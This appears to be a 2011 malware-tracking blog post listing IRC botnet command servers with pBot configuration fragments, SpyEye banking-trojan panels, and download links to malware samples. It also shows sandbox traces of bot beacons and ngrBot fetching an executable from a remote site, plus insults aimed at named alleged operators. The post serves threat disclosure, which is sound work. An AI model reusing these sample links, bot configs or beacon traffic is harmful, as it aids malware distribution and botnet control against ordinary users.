Month: June 2011

211.60.155.2(linux bots hosted in Korea, Republic Of Ulsan Dacom Corp)

var $config = array(“server”=>”211.60.155.2”, “port”=>”9999”, “pass”=>””, “prefix”=>”syik”, “maxrand”=>”4”, “chan”=>”#setoran”, “chan2″=>”#setoran”, “key”=>”setoran”, “modes”=>”+p”, “password”=>”setoran”, “trigger”=>”.”, “hostauth”=>”racrew” hosting infos: http://whois.domaintools.com/211.60.155.2

21mb malware samples

Alot of spyeye variants and other banking trojans,irc bots,worms etc Download: http://adf.ly/1xAh4

theimageshare.com (bfbot creator reborn?iserdo using spyeye hosted in Netherlands Amsterdam Snel Internet Services B.v)

Spy Eye Panel: http://theimageshare.com/kurac/ Spy Eye Sample: http://89.207.135.198/pas.exe http://adf.ly/1x8Rp just in case first link is removed Websites used to infect people: butterflysolutions.net ??? iserdo need money ? imageshare.cc iserdo.net ???? lol popusi.biz HTTP QueriesHTTP Query Text – 5xf9~x15x10x11x11x11x11x16x15x15x15x15x17x17x17x17x1ax1ax1ax1anx01!U4V:__-H8ty{{juuuux17xx0cS4A(LLx19jx0f}x0fN theimageshare.com GET /kurac/gate.php?guid=User!SANDBOXB!38BA2BE7&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&cpu=100&ccrc=FADB319B&md5=e47f5cbd0ae6d17cbeb5530db3f9779f HTTP/1.1 Windows Api CallsPId Image Name Address Function ( Parameters ) | Return Value

privathosting.be/~ishigo/(Spy Eye Banking Trojan hosted in Viet Nam Layer 2 -customer Nework Of Vtdc)

ishigo is a poor french lamer he’s known in carding boards Exe File: http://privathosting.be/~ishigo/ptcmd.exe Avira fail detecting this: Nom du fichier Résultat ptcmd.exe FALSE POSITIVE Le fichier ‘ptcmd.exe’ a été classifié comme ‘FALSE POSITIVE’. Cela signifie que ce fichier n’est pas dangereux et qu’il s’agit d’un message erroné de notre part. Le modèle de détection

HTTP malware

DNS QueriesDNS Query Text www.agriturismoraggiodisole.com IN A + www.agit.com.br IN A + www.ameagaru.fr IN A + HTTP QueriesHTTP Query Text www.agriturismoraggiodisole.com POST /files/filtect.php HTTP/1.0 www.agit.com.br POST /apuracao/filtect.php HTTP/1.0 www.ameagaru.fr POST /memo/filtect.php HTTP/1.0 DNS QueriesDNS Query Text www.allahskanan.net IN A + www.groupe-cogit.com IN A + fercon.ro IN A + demo.ckentgroup.com IN A + HTTP QueriesHTTP Query

92.241.164.155(ngrBot hosted in Russian Federation Oao Webalta)

Remote Host Port Number 174.132.149.187 80 208.79.237.100 80 213.251.170.52 80 92.241.164.155 7654 PASS ngrBot NICK n{US|XPa}sxwscly USER sxwscly 0 0 :sxwscly JOIN #oldgold noKIDs PRIVMSG #oldgold :[d=”http://buenosairesrestaurante.com/js/jquery/plugins/supefish.js.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0 PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) – Redirected 31 domain(s) hosting infos: http://whois.domaintools.com/92.241.164.155

27-225-115-208.reverse.lstn.net(600 linux bots hosted in United States Limestone Networks Inc)

class pBot { var $config = array(“server”=>”208.115.225.27”, “port”=>”2390”, “pass”=>””, “prefix”=>”BoT”, “maxrand”=>”3”, “chan”=>”#dada”, “chan2″=>”#dada”, “key”=>”123456”, “modes”=>”+p”, “password”=>”123”, “trigger”=>”.”, “hostauth”=>”*” // * for any hostname (remember: /setvhost xdevil.org) ); Clients: I have 162 clients and 0 servers Local users: Current Local Users: 162 Max: 585 Global users: Current Global Users: 162 Max: 477 Joins: [A]BoT824 12[ 15BoT545@rox-E8B5EA1.xrea.com]